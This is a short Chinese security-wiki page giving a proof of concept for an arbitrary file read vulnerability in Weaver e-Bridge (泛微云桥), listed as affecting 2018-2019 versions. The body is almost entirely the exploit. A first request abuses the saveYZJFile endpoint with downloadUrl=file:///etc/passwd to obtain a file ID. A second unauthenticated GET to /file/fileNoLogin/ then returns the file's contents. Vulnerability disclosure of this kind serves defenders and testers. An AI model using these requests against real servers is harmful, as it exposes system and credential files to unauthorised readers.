menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right 泛微云桥 e-Bridge chevron_right 泛微云桥 e-Bridge 任意文件读取
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    泛微云桥 e-Bridge任意文件读取

    影响版本:

    • 2018-2019

    poc

    1、得到ID值
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

2、构造get请求获取文件内容
/file/fileNoLogin/8e2558b16851455285ebf95c3e8e1184

    [@雷石实验室]()